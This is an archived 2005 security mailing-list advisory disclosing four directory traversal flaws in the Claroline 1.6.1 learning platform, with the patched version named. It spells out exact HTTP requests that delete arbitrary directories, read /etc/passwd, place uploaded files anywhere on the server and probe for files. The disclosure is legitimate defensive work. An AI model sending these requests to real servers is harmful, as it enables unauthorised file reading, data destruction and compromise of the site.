lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BAY17-F36D1292002686AAE02E5DACBC0@phx.gbl>
Date: Fri Aug 12 09:35:46 2005
From: robbedekeyzer at hotmail.com (fdsf hfdhfjk)
Subject: Multiple directory traversal vulnerabilities in
	Claroline



Product description: Claroline (http://www.claroline.net) is a free 
application based on PHP /MySQL. It's a collaborative learning environment 
allowing teachers or education institutions to create and administer courses 
through the web.

Vulnerability: Claroline 1.6.1 is vulnerable to multiple directory traversal 
attacks. You have to have teacher privileges to perform any of these.


1) Arbitrary directory deletion

GET /claroline/scorm/scormdocument.php?delete=/../../001

Any directory owned by user www can be deleted, it does not have to be 
empty.


2) Arbitrary file reading

POST /claroline/document/document.php
content: 
move_file=%2F../../../../../../../../etc/passwd&move_to=%2F&move_file_submit=OK

Then: GET /courses/2510/document/passwd  (where 2510 is the course id)


3) Arbitrary file creation

With /claroline/document/document.php, one can upload any file with any 
content (no php files)
Using the same vulnerability as (2), one could move this file to anywhere on 
the system.

POST /claroline/document/document.php
content: move_file=%2Ffile.cgi&move_to=%2F../..&move_file_submit=OK


4) Checking if certain files exist on the system  (much less critical)

GET 
/claroline/scorm/showinframes.php?openfirst=yes&indexRoute=&file=/tmp/test.txt
GET /claroline/scorm/contents.php?file=/tmp%2Ftest.txt


Solution: upgrade to version 1.6.2, the latest release, available at 
http://www.claroline.net/download.htm


Robbe De Keyzer (robbedekeyzer@...mail.com)
August 12, 2005

_________________________________________________________________
Gratis bloggen op MSN Spaces  http://spaces.msn.com/?mkt=nl-be

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ